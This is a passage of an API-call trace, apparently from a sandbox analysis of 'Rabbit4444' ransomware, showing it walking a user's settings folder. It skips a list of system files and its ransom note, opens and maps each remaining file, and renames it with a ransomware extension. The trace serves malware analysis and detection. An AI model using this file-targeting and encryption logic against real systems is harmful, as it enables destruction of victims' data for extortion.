nFileSizeHigh=0x0, nFileSizeLow=0x584, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", cAlternateFileName="AA8CB1~1.SET")) returned 1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.967] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.967] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms" [0056.967] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.967] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms") returned 87 [0056.967] lstrlenW (lpString="Rabbit4444") returned 10 [0056.967] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.967] lstrlenW (lpString=".dll") returned 4 [0056.968] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.968] lstrlenW (lpString=".lnk") returned 4 [0056.968] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.968] lstrlenW (lpString=".ini") returned 4 [0056.968] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.968] lstrlenW (lpString=".sys") returned 4 [0056.968] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.968] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isfollowinsertpointenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.968] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.968] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14827873179) returned 1 [0056.968] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1412) returned 1 [0056.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0056.968] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0056.968] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x890, lpName=0x0) returned 0x298 [0056.969] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x890) returned 0x70000 [0056.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0056.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.970] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0056.970] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14828115805) returned 1 [0056.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0056.970] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0056.971] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.971] CloseHandle (hObject=0x298) returned 1 [0056.971] CloseHandle (hObject=0x278) returned 1 [0056.971] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms.Rabbit4444") returned 215 [0056.971] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isfollowinsertpointenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowInsertPointEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isfollowinsertpointenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.971] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b5f1aa1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1b5f1aa1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x575, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", cAlternateFileName="AAA651~1.SET")) returned 1 [0056.977] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.977] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.977] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.977] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.977] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.977] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.978] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.978] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.978] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.978] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.978] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.978] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms" [0056.978] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.978] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms") returned 84 [0056.978] lstrlenW (lpString="Rabbit4444") returned 10 [0056.978] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.978] lstrlenW (lpString=".dll") returned 4 [0056.978] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.978] lstrlenW (lpString=".lnk") returned 4 [0056.978] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.978] lstrlenW (lpString=".ini") returned 4 [0056.978] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.978] lstrlenW (lpString=".sys") returned 4 [0056.978] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.978] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isfollowkeyfocusenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.979] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.979] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14828946474) returned 1 [0056.979] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1397) returned 1 [0056.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.979] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1018d0 [0056.979] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x880, lpName=0x0) returned 0x298 [0056.980] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x880) returned 0x70000 [0056.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.981] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.981] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.981] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.981] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.981] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.981] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14829201153) returned 1 [0056.981] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.981] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1018d0 | out: hHeap=0xe0000) returned 1 [0056.981] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.981] CloseHandle (hObject=0x298) returned 1 [0056.982] CloseHandle (hObject=0x278) returned 1 [0056.982] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms.Rabbit4444") returned 212 [0056.982] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isfollowkeyfocusenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsFollowKeyFocusEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isfollowkeyfocusenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.982] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b7e1911, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1b7e1911, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", cAlternateFileName="AABD4E~1.SET")) returned 1 [0056.982] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.982] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.982] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.982] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2=".") returned 1 [0056.982] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="..") returned 1 [0056.982] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="windows") returned -1 [0056.983] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.983] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.983] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="boot") returned -1 [0056.983] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.983] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.983] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms" [0056.983] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.983] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms") returned 84 [0056.983] lstrlenW (lpString="Rabbit4444") returned 10 [0056.983] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.983] lstrlenW (lpString=".dll") returned 4 [0056.983] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.983] lstrlenW (lpString=".lnk") returned 4 [0056.983] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.983] lstrlenW (lpString=".ini") returned 4 [0056.983] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.983] lstrlenW (lpString=".sys") returned 4 [0056.983] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.983] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isinversioncolorenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.983] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.984] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14829429470) returned 1 [0056.984] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1382) returned 1 [0056.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.984] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.984] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x870, lpName=0x0) returned 0x298 [0056.985] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x870) returned 0x70000 [0056.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0056.986] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0056.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.986] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14829681826) returned 1 [0056.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.986] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.986] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.986] CloseHandle (hObject=0x298) returned 1 [0056.986] CloseHandle (hObject=0x278) returned 1 [0056.986] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms.Rabbit4444") returned 212 [0056.986] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isinversioncolorenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Magnifier_IsInversionColorEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_magnifier_isinversioncolorenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.991] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bb28d74, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1bb28d74, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", cAlternateFileName="AA8E91~1.SET")) returned 1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2=".") returned 1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="..") returned 1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="windows") returned -1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="boot") returned -1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.991] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.991] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms" [0056.991] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.991] lstrlenW (lpString="AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms") returned 67 [0056.991] lstrlenW (lpString="Rabbit4444") returned 10 [0056.992] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.992] lstrlenW (lpString=".dll") returned 4 [0056.992] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.992] lstrlenW (lpString=".lnk") returned 4 [0056.992] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.992] lstrlenW (lpString=".ini") returned 4 [0056.992] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.992] lstrlenW (lpString=".sys") returned 4 [0056.992] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.992] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_MouseCursorColor.settingcontent-ms" (normalized: 